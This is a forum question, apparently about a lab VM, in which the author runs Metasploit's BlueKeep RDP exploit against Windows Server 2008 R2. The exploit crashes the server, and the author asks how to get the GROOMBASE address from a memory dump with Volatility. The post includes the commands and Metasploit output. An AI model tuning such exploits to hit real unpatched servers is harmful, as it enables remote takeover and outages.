I am exploiting the BlueKeep vulnerability in Windows Server 2008 R2 using the Metasploit Framework. When I run the exploit windows/rdp/cve_2019_0708_bluekeep_rce, it ends in a BSOD on the server and then the server restarts. I searched on the internet and found that I might have to change the GROOMBASE address in the exploit. I am using Volatility to get this address from a memory dump of the server. Here is the command I came up with:

.\volatility_2.6_win64_standalone.exe --profile=Win2008R2SP1x64 -f vm.memdump bigpools

But this command gives me never-ending output:

Volatility Foundation Volatility Framework 2.6
Allocation         Tag      PoolType                   NumberOfBytes
------------------ -------- -------------------------- -------------
0xfffff8a002dc3000 CM31     PagedPoolCacheAligned      0x1000L
0xfffff8a0074e6000 CM31     PagedPoolCacheAligned      0x1000L
0xfffff8a003747000 CM31     PagedPoolCacheAligned      0x1000L
0xfffffa8000eb7000 Cont     NonPagedPool               0x1000L
0xfffff8a0040cb000 CM31     PagedPoolCacheAligned      0x1000L
0xfffff8a004a4f000 CM31     PagedPoolCacheAligned      0x2000L
0xfffff8a000cb0000 CIcr     PagedPool                  0x3330L
0xfffff8a0053d3000 CM31     PagedPoolCacheAligned      0x1000L
0xfffff8a001634001 CM31     PagedPoolCacheAligned      0x1000L
0xfffff8a005d57000 CM31     PagedPoolCacheAligned      0x1000L
0xfffff8a001fb8000 CM31     PagedPoolCacheAligned      0x1000L
0xfffff8a0066db000 CM31     PagedPoolCacheAligned      0x1000L
and goes on ..

I had to interrupt the command to make it stop. Then I randomly used the first NPP address, which (is definitely not correct) gave me a BSOD on the server; the Metasploit output is here:

[*] 192.168.0.60:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.0.60:3389     - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.0.60:3389     - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.0.60:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[!] 192.168.0.60:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.0.60:3389 - Surfing channels ...
[*] 192.168.0.60:3389 - Lobbing eggs ...
[*] 192.168.0.60:3389 - Forcing the USE of FREE'd object ...
[!] 192.168.0.60:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Started bind TCP handler against 192.168.0.60:4444
[*] Exploit completed, but no session was created.

I guess the above result is due to the wrong GROOMBASE address which I selected.

The link (given above) I am following uses Docker to get the NPP Start address. My question is: can I find that address using Volatility, as it is also a memory forensics tool? Please suggest which command I should be using.

aneela

0 Answers